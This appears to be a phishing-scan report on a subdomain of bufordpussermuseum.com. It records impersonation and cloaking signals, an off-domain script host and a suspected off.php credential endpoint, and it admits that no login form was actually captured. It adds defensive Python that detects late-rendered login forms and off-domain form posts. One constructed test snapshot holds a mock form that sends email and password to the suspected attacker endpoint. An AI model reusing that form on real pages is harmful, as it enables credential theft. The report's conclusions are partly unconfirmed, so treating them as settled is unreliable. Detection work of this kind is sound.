https://wd.bufordpussermuseum.com/
104.18.0.43 · Cloudflare, Inc.
Toronto, Canada
7352 days
200 · 67.6s
Valid · E7, Let's Encrypt, US
COMPLETED
Registered-domain escalation
Submit bufordpussermuseum.com as the primary IOC, enriched with evidence from hostile subdomains like wd.bufordpussermuseum.com.
No KB/IOK detections were recorded for this scan.
museum | other · 6/3/2026
The page at wd.bufordpussermuseum.com displays branding and assets that do not match the official Buford Pusser Museum domain. Network and HTML evidence show off-domain script loading from mama.atarhaber.com and other external assets, with SPA-like behavior and no static login forms present. The screenshot shows a generic promotional UI in Turkish with unrelated branding; the off.php endpoint and dynamic form rendering point to cloaking and credential-capture behavior, so the signal is impersonation rather than confirmed first-party use. The analyst flagged likely cloaking/evasion behavior for this target (analyst note: this target may cloak content or block scanners).
Capture
Stages: 3
Canonical: Late Render (+3s)
Changed: No
Credential Signals
Forms: 0
Password fields: 0
Late-stage login UI: No
Resource Signals
Resources: 21
Hosts: 7
Domains: 7
Suspicious Endpoints
hxxps://cdn3d[.]iconscout[.]com/3d/free/thumb/free-telegram-3d-icon-png-download-7516821.png
Off-Domain Posts
hxxps://cdn3d[.]iconscout[.]com/3d/free/thumb/free-telegram-3d-icon-png-download-7516821.png
No specific IOCs identified in source
The page is served from a subdomain (wd.bufordpussermuseum.com) behind Cloudflare with a recently issued Let's Encrypt certificate, but the scan evidence points to cloaking and credential capture. Off-domain scripts and assets are loaded from mama.atarhaber.com, including the off.php endpoint, which indicates possible exfiltration of captured credentials or redirection. The SPA-like structure warrants caution: neither the static capture nor the late-render stage recorded a form or password field (Forms: 0, Password fields: 0, Late-stage login UI: No), so the credential-capture assessment rests on the off.php reference and the dynamic rendering rather than on a captured login form. Note also that the listed suspicious endpoint and off-domain post are a static image on cdn3d.iconscout.com, not the off.php endpoint; the raw capture should be reviewed to confirm that endpoint before taking action. Given the impersonation signals and off-domain resources, further abuse investigation and a domain/hosting review are warranted. The analyst-reported cloaking/evasion suspicion increases confidence that the operator is actively attempting to evade automated analysis; analyst context was provided and corroborated during this assessment (analyst note: this target may cloak content or block scanners).
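The Credential Signals and Resource Signals above are derived from captured page stages: count forms and password fields per stage, resolve every resource and form-action host, and compare it against the page's registered domain. The following is an added example of that derivation, not the scanner's own code. The two HTML snapshots are constructed (the late stage injects a form posting to a hypothetical off.php on mama.atarhaber.com, which this scan did not actually capture), and registered-domain extraction is a last-two-labels approximation; a production scanner would use the Public Suffix List.

```python
"""Derive credential and resource signals from captured page stages.

Added example (not the scanner's code). Snapshots below are constructed;
registered_domain() is a last-two-labels approximation of the PSL.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

PAGE_URL = "https://wd.bufordpussermuseum.com/"

# Constructed early-stage capture: SPA shell, off-domain script, no forms.
EARLY_STAGE = """<html><head>
<script src="https://mama.atarhaber.com/app.js"></script>
<script src="/static/bundle.js"></script></head>
<body><div id="app"></div>
<img src="https://cdn3d.iconscout.com/3d/free/thumb/icon.png"></body></html>"""

# Constructed late-stage capture: a login form rendered dynamically into the
# SPA root, posting to a hypothetical third-party PHP endpoint.
LATE_STAGE = EARLY_STAGE.replace(
    '<div id="app"></div>',
    '<form action="https://mama.atarhaber.com/off.php" method="post">'
    '<input name="email"><input type="password" name="pw"></form>')


def registered_domain(host):
    """Approximate registered domain: last two DNS labels (assumption)."""
    return ".".join(host.lower().split(".")[-2:])


class StageParser(HTMLParser):
    """Collect resource URLs, form actions and password inputs from HTML."""

    def __init__(self):
        super().__init__()
        self.resources = []      # (tag, url) for script/img/iframe/link
        self.forms = []          # form action attributes ('' = same page)
        self.password_fields = 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "img", "iframe") and a.get("src"):
            self.resources.append((tag, a["src"]))
        elif tag == "link" and a.get("href"):
            self.resources.append((tag, a["href"]))
        elif tag == "form":
            self.forms.append(a.get("action") or "")
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            self.password_fields += 1


def analyze_stage(html, page_url=PAGE_URL):
    """Return the per-stage credential and resource signals."""
    parser = StageParser()
    parser.feed(html)
    page_domain = registered_domain(urlparse(page_url).hostname)

    hosts = set()
    for _, url in parser.resources:
        host = urlparse(urljoin(page_url, url)).hostname  # resolve relative URLs
        if host:
            hosts.add(host)

    off_posts = []
    for action in parser.forms:
        target = urljoin(page_url, action)  # empty action posts to the page itself
        host = urlparse(target).hostname
        if host and registered_domain(host) != page_domain:
            off_posts.append(target)

    return {
        "forms": len(parser.forms),
        "password_fields": parser.password_fields,
        "hosts": sorted(hosts),
        "off_domain_hosts": sorted(
            h for h in hosts if registered_domain(h) != page_domain),
        "off_domain_posts": off_posts,
    }


def compare_stages(early_html, late_html, page_url=PAGE_URL):
    """Flag a login UI that only appears after client-side rendering."""
    early = analyze_stage(early_html, page_url)
    late = analyze_stage(late_html, page_url)
    return {
        "late_stage_login_ui": late["password_fields"] > 0
                               and early["password_fields"] == 0,
        "new_off_domain_posts": [u for u in late["off_domain_posts"]
                                 if u not in early["off_domain_posts"]],
        "changed": early != late,
    }


if __name__ == "__main__":
    print(analyze_stage(EARLY_STAGE))
    print(compare_stages(EARLY_STAGE, LATE_STAGE))
```

Against the constructed early stage this reports 0 forms and 0 password fields while still listing mama.atarhaber.com and cdn3d.iconscout.com as off-domain hosts, which is the same shape as the scan above; the late stage turns on late_stage_login_ui and surfaces the off-domain post target. A cloaking operator can defeat the comparison by serving the SPA shell only to scanners, which is why the analyst note about blocked scanners matters when both stages show zero forms.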
Suspend Domain